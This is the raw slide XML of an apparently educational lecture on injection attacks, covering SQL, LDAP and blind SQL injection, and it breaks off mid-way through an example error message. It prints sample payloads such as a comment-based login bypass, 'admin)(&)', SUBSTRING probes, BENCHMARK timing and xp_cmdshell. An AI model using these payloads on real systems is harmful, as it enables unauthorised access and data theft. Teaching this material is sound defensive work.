                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="969696"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/*’AND Password = ’secret’;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000" b="1">
              <a:solidFill>
                <a:srgbClr val="969696"/>
              </a:solidFill>
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr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b="1">
              <a:solidFill>
                <a:srgbClr val="969696"/>
              </a:solidFill>
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr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/>
              <a:t>Oops!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp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97A3B15-0AAC-49AB-9D14-8B17B344ED17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10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645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Two types of SQL injection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00621"/>
            <a:ext cx="8424936" cy="552472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500"/>
              </a:spcBef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/>
              <a:t>Attacker can try to</a:t>
            </a:r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/>
              <a:t>manipulate a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0033CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SQL query  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>`</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef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/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1"/>
              <a:t>eg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t> using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en-GB" sz="1800" dirty="0"/>
              <a:t>,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en-GB" sz="1800" dirty="0"/>
              <a:t> or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UNION</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef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endParaRPr lang="en-GB" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod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/>
              <a:t>or inject a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0033CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>database command</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0033CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0033CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef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/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1"/>
              <a:t>eg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t> using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DROP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="331788" indent="-331788"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2200" dirty="0"/>
              <a:t>     </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="331788" indent="-331788"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endParaRPr lang="en-GB" sz="2200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="331788" indent="-331788"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endParaRPr lang="en-GB" sz="2200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="331788" indent="-331788" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="9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/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef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/>
              <a:t>Esp. latter depends highly on infrastructure: every database system</a:t>
            </a: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/>
              <a:t>has its own commands </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="450"/>
              </a:spcBef>
              <a:buFont typeface="Comic Sans MS" pitchFamily="66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 err="1"/>
              <a:t>eg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>. Microsoft SQL Server has  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0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exec </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00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master.dbo.xp_cmdshell</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0099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90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="450"/>
              </a:spcBef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/>
              <a:t>and may/may not allow use of ;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="450"/>
              </a:spcBef>
              <a:buFont typeface="Comic Sans MS" pitchFamily="66" charset="0"/>
              <a:buChar char="•"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1800" dirty="0" err="1"/>
              <a:t>eg.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t> Oracle database accessed via Java or PL/SQL does not</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="296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398273D-AEE3-49C9-B34D-C11DC0D9E664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11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554948"/>
            <a:ext cx="4225909" cy="130080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pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 5" descr="C:\Users\erikpoll\Desktop\8.jpg">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{10AEFBC1-6AF5-1BBE-3FB6-3BE119242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11650" r="4858"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5292080" y="1000621"/>
            <a:ext cx="2808312" cy="121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665499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LDAP injection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1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0033CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>LDAP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>is a protocol for accessing so-called service directories,                        </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>esp. Microsoft’s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0033CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Active Directory </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>for user authentication &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>authorisation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>.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A username-password input by client may be translated to LDAP query</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>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(&amp;(USER=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name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)(PASSWD=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pwd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)) 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r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>An attacker entering as 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</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>      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admin)(&amp;)  </a:t>
            </a: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- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> here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(&amp;) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>is LDAP notation for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TRUE - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>will create LDAP query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/>
              <a:t>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(&amp;(USER=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="18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admin)(&amp;)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(PASSWD=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pwd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>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>where only first part is used. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>There are dozens of variants of injection attacks, for different languages and backends</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0"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>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB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18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Blind injection attacks</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" b="0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770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/>
              <a:t>Blind SQL injection</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="491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040560"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/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US" sz="1800" dirty="0"/>
              <a:t>Suppose   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  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>http://newspaper.com/items.php?id=2</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="339933"/>
              </a:solidFill>
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRP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GB" sz="1800" dirty="0"/>
              <a:t>results in SQL injection-prone query</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1800" b="1" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRP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GB" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>SELECT title, body FROM items WHERE id=2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endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="339933"/>
              </a:solidFill>
            </a:endParaRP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US" sz="1800" i="1" dirty="0"/>
              <a:t>Will we see different responses for URLs below?  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+mj-lt"/>
              <a:buAutoNum type="arabicPeriod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http://newspaper.com/items.php?id=2 AND 1=1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+mj-lt"/>
              <a:buAutoNum type="arabicPeriod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http://newspaper.com/items.php?id=2 AND 1=2</a:t>
            </a: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+mj-lt"/>
              <a:buAutoNum type="arabicPeriod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endParaRPr lang="en-US" sz="1800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  <a:p>
            <a:pPr marL="457200" indent="-457200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GB" sz="1800" i="1" dirty="0"/>
              <a:t>What will be the result of  </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" b="1" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="339933"/>
              </a:solidFill>
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="334963" indent="-334963">
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef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  ../</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1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items.php?id</a:t>
            </a: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=2 AND SUBSTRING(user,1,1) = ’a’ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>?</a:t>
            </a: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en-GB" sz="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="009900"/>
              </a:solidFill>
            </a:endParaRP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GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> The same as 1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>iff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill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user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> starts with a; otherwise the same as 2!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endParaRPr lang="en-GB" sz="1800" dirty="0"/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r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>So we can find out things about database structure &amp; content!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endParaRPr lang="en-GB" dirty="0"/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endParaRPr lang="en-GB" dirty="0"/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  <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp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A15679-40E7-4DE9-9D6B-0854432B0A12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95658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Blind SQL injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4813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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0033CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Blind SQL injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>a SQL injection where the response itself is not interesting,  but  where (lack of) response  leaks information to an attacker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dirty="0"/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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0033CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Errors</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> can also leak interesting information:  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>eg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> for</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" b="1" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRP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b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>     IF &lt;some condition&gt; SELECT 1 ELSE 1/0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dirty="0"/>
              <a:t>          error message may reveal if </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;some condition&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>is true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b="1" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRP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dirty="0"/>
              <a:t>More subtle than this,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0033CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>response time </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>may still leak information </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" b="1" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRP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GB" b="1" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    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.. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>IF(SUBSTRING(user,1,1) =‘a’,  </a:t>
            </a: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Times New Roman" pitchFamily="16" charset="0"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b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>            BENCHMARK(50000, … ), null)..</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="339933"/>
              </a:solidFill>
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr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dirty="0"/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 typeface="Arial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dirty="0"/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dirty="0"/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dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="334963" indent="-334963" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSz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GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp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F48531-7376-4D99-9239-7781696A30F4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2699792" y="5301208"/>
            <a:ext cx="5357812" cy="720080"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -44234"/>
              <a:gd name="adj2" fmla="val -76223"/>
              <a:gd name="adj3" fmla="val 16667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time-consuming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BENCHMARK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statement only executed if </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="20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</a:rPr>
              <a:t>user</a:t>
            </a:r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 starts with ‘a’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970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/>
              <a:t>Other forms of information leakage: error messages</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40964" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="436215" y="1196752"/>
            <a:ext cx="8229600" cy="485740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400"/>
              </a:spcBef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dirty="0"/>
              <a:t>Example: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>error generated by our old institute’s online diary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itchFamily="16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1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="3333CC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itchFamily="16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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3333CC"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Database error: Invalid SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: (SELECT egw_cal_repeats.*,egw_cal.*,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>cal_start,cal_end,cal_recur_date</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> FROM  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>egw_cal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> JOIN </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>egw_cal_dates</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> ON </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>egw_cal.cal_id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>egw_cal_dates.cal_id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  JOIN </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>egw_cal_user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> ON </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>egw_cal.cal_id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>egw_cal_user.cal_id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> LEFT JOIN  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>egw_cal_repeats</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> ON </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>egw_cal.cal_id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>egw_cal_repeats.cal_id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> WHERE (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>cal_user_type</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>='u' AND </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>cal_user_id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> IN (56,-135,-2,-40,-160)) AND </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>cal_status</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> != 'R' AND 1225062000 &lt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>cal_end</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> AND </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>cal_start</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> &lt; 1228082400 AND </a:t>
            </a:r>
            <a:r>
